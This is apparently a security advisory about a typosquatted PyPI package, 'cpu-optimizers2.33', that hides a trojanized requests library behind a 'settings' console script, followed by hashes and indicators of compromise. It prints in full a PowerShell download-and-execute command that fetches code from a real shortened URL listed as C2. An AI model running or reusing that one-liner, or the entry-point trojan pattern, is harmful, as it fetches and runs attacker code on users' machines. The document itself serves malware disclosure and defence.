VDB
GCVE-110-OSM-2026-2549
GCVE-110-OSM-2026-2549
Advisory PublishedCVSS 8.8/10
The malicious PyPI package "cpu-optimizers2.33" is a typosquatting attack that masquerades as a CPU optimization tool while containing a trojanized version of the popular Python requests library. The package targets Windows systems by executing a PowerShell command that downloads and executes a second-stage payload from a shortened URL when the installed console script is run. The malware uses social engineering by stealing the legitimate requests library's metadata, including author names and project descriptions, to appear trustworthy to potential victims. Upon installation, the package creates a console script named "settings" that serves as the infection vector, executing malicious PowerShell code that fetches additional payloads from external infrastructure.
The malicious code is triggered through a console script entry point defined in the package's pyproject.toml configuration, which maps the "settings" command to execute the main function in requests.starter module. The payload itself consists of a simple Python script that uses the subprocess module to launch PowerShell with specific arguments designed to download and execute code from a remote server. The PowerShell command "irm https://tinyurl.com/47h5bmcw | iex" uses PowerShell's Invoke-RestMethod to fetch content from a shortened URL and immediately executes it using Invoke-Expression, allowing the attackers to dynamically serve different payloads or update their malicious code without modifying the original package. The package attempts to blend in by including a complete replica of the requests library codebase, making it appear legitimate during casual inspection while hiding the malicious functionality in the starter.py module that would only be executed when the victim runs the "settings" command.
IOCs:
- Package SHA256: 1d1bdb312e7a1cb9b1b8d71efb1337f43dd8dcc01d9ea20dadd89d63e1e38f3e — package file hash
- Package MD5: 25c66c9104a8e1849e42bf9ce651d34d — package file hash
- Malicious File Path: src/requests/starter.py — contains PowerShell execution payload
- Malicious File SHA256: 69150d0d2698394a3d31c83a07fe2cbbeefe6b6a1de0b627e670c19e365da752 — starter.py file hash
- Malicious File MD5: 8c7c97e1302aeb0298061368f8dc0666 — starter.py file hash
- C2 URL: https://tinyurl.com/47h5bmcw — second-stage payload download URL
- Console Script: settings — malicious command installed by package
- Entry Point: requests.starter:main — Python module execution path
Decoded/deobfuscated IOCs:
- domains: trust.python.org, on.org
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | cpu-optimizers2.33 | all (affected) | — |
Aliases
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.